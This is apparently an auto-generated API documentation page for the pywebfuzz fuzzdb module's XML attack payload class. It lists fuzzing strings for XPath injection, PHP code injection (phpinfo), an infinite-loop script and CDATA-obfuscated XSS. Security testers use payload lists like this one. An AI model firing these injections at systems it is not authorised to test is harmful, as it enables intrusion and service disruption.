Package pywebfuzz :: Module fuzzdb :: Class attack_payloads :: Class xml
[hide private]
[frames] | no frames]

Class xml

This implements the xml payloads from fuzzdb

Class Variables [hide private]
  location = '/data/attack-payloads/xml/xml-attacks.txt'
  xml_attacks = ['count(/child::node())', 'x\' or name()=\'usern...
Class Variable Details [hide private]

xml_attacks

Value:
['count(/child::node())',
 'x\' or name()=\'username\' or \'x\'=\'y',
 '<name>\',\'\')); phpinfo(); exit;/*</name>',
 '<![CDATA[<script>var n=0;while(true){n++;}</script>]]>',
 '<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(\'XSS\');<![CDATA[<]]>/SCRIPT<\
![CDATA[>]]>',
 '"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SC\
RIPT<![CDATA[>]]>alert(\'XSS\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo\
...